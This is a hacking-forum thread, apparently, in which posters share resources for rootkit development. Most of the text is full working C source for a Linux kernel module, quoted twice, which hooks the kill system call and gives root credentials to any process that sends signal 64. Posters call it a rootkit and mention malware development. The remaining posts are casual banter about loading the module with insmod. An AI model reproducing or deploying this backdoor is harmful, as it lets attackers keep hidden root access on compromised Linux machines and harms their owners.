[REQUEST] Resources for Rootkit Development?
#11
(01-21-2021, 05:51 AM)Vector Wrote:
(01-21-2021, 05:08 AM)ueax Wrote: Sure! I had followed the resource in DeepLogic's post which had a very walkthrough with how to write a LKM for Linux in C.
After going through a few sections, I made a LKM that if a user had permissions to use 'insmod', they could insert the LKM below
that if a user were to run 'kill -64 123' (123 being any number) they would escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher level functions that can be used to hook existing syscalls.

Code:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ueax");
MODULE_DESCRIPTION("syskill esc");
MODULE_VERSION("0.3");
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

asmlinkage int hook_kill(const struct pt_regs *regs)
{
    void set_root(void);
    int sig = regs->si;
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(regs);
}

#else
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage int hook_kill(pid_t pid, int sig)
{
    void set_root(void);
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
return orig_kill(pid, sig);
}
#endif

void set_root(void)
{
    struct cred *root;
    root = prepare_creds();

    if (root == NULL)  return;

    root->uid.val = root->gid.val = 0;
    root->euid.val = root->egid.val = 0;
    root->suid.val = root->sgid.val = 0;
    root->fsuid.val = root->fsgid.val = 0;

    commit_creds(root);
}

static struct ftrace_hook hooks[] =
{
    HOOK("sys_kill", hook_kill, &orig_kill),
};

static int __init rootkit_init(void)
{
    int err;
    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if (err)
        return err;
    printk(KERN_INFO "RootKit: Loaded.\n");
    return 0;
}

static void __exit rootkit_exit(void)
{
    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
    printk(KERN_INFO "RootKit: Unloaded\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.

Not bad at all, how are you planning to load the kernel modules? Also, it's good to know you have some experience with MalDev, i have adjusted the Data Stream to your Secure Repo accordingly. It will be ready in 30 minutes. I have also added you on XMPP.

I have sent you a PM with the pertinent information related to your Secure Repo.

You use "insmod" to insert the kernel module. You need root to use it usually. Of course that's why it's called a rootkit. I've been following the tutorial as well, which is why I recommended it. The author is really good at explaining things well.
Reply
#12
(01-21-2021, 03:51 PM)DeepLogic Wrote:
(01-21-2021, 05:51 AM)Vector Wrote:
(01-21-2021, 05:08 AM)ueax Wrote: Sure! I had followed the resource in DeepLogic's post which had a very walkthrough with how to write a LKM for Linux in C.
After going through a few sections, I made a LKM that if a user had permissions to use 'insmod', they could insert the LKM below
that if a user were to run 'kill -64 123' (123 being any number) they would escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher level functions that can be used to hook existing syscalls.

Code:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ueax");
MODULE_DESCRIPTION("syskill esc");
MODULE_VERSION("0.3");
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

asmlinkage int hook_kill(const struct pt_regs *regs)
{
    void set_root(void);
    int sig = regs->si;
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(regs);
}

#else
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage int hook_kill(pid_t pid, int sig)
{
    void set_root(void);
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
return orig_kill(pid, sig);
}
#endif

void set_root(void)
{
    struct cred *root;
    root = prepare_creds();

    if (root == NULL)  return;

    root->uid.val = root->gid.val = 0;
    root->euid.val = root->egid.val = 0;
    root->suid.val = root->sgid.val = 0;
    root->fsuid.val = root->fsgid.val = 0;

    commit_creds(root);
}

static struct ftrace_hook hooks[] =
{
    HOOK("sys_kill", hook_kill, &orig_kill),
};

static int __init rootkit_init(void)
{
    int err;
    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if (err)
        return err;
    printk(KERN_INFO "RootKit: Loaded.\n");
    return 0;
}

static void __exit rootkit_exit(void)
{
    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
    printk(KERN_INFO "RootKit: Unloaded\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.

Not bad at all, how are you planning to load the kernel modules? Also, it's good to know you have some experience with MalDev, i have adjusted the Data Stream to your Secure Repo accordingly. It will be ready in 30 minutes. I have also added you on XMPP.

I have sent you a PM with the pertinent information related to your Secure Repo.

You use "insmod" to insert the kernel module. You need root to use it usually. Of course that's why it's called a rootkit. I've been following the tutorial as well, which is why I recommended it. The author is really good at explaining things well.

Oh lmao, my bad, i thought he meant he was working on a kernel module that would make it so a user without root could use `insmod` to load what he had posted in code tags. Which is why i was wondering how the kernel module that would affect `insmod` would be loaded in the first place if that were the scenario.

You can tell me i'm a big dumb now if you'd like Sleepy
Reply
#13
(01-21-2021, 03:59 PM)Vector Wrote: Oh lmao, my bad, i thought he meant he was working on a kernel module that would make it so a user without root could use `insmod` to load what he had posted in code tags. Which is why i was wondering how the kernel module that would affect `insmod` would be loaded in the first place if that were the scenario.

You can tell me i'm a big dumb now if you'd like :sleepy:

Lol it happens dude. No sweat. But we're going to have to demote you for that one XD
Reply
#14
(01-22-2021, 02:58 PM)DeepLogic Wrote:
(01-21-2021, 03:59 PM)Vector Wrote: Oh lmao, my bad, i thought he meant he was working on a kernel module that would make it so a user without root could use `insmod` to load what he had posted in code tags. Which is why i was wondering how the kernel module that would affect `insmod` would be loaded in the first place if that were the scenario.



You can tell me i'm a big dumb now if you'd like Sleepy



Lol it happens dude. No sweat. But we're going to have to demote you for that one XD

My position in the hierarchy is unassailable, there is no 'we' with the authority to demote me  Sleepy
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CIA Vault7 Leak - Development Tradecraft DOs and DON'Ts Insider 2 11,275 04-25-2020, 02:21 PM
Last Post: Insider
  Ransomware Development Made Easy BigBoss 4 8,561 04-27-2019, 03:58 PM
Last Post: hotmagnet
  Vlany - LD_PRELOAD rootkit (x86 & x86_64) [In active development] Yagmi 3 10,030 11-24-2016, 02:59 AM
Last Post: fsck
  MS PowerShell Resources. Vector 1 7,449 11-24-2016, 02:43 AM
Last Post: fsck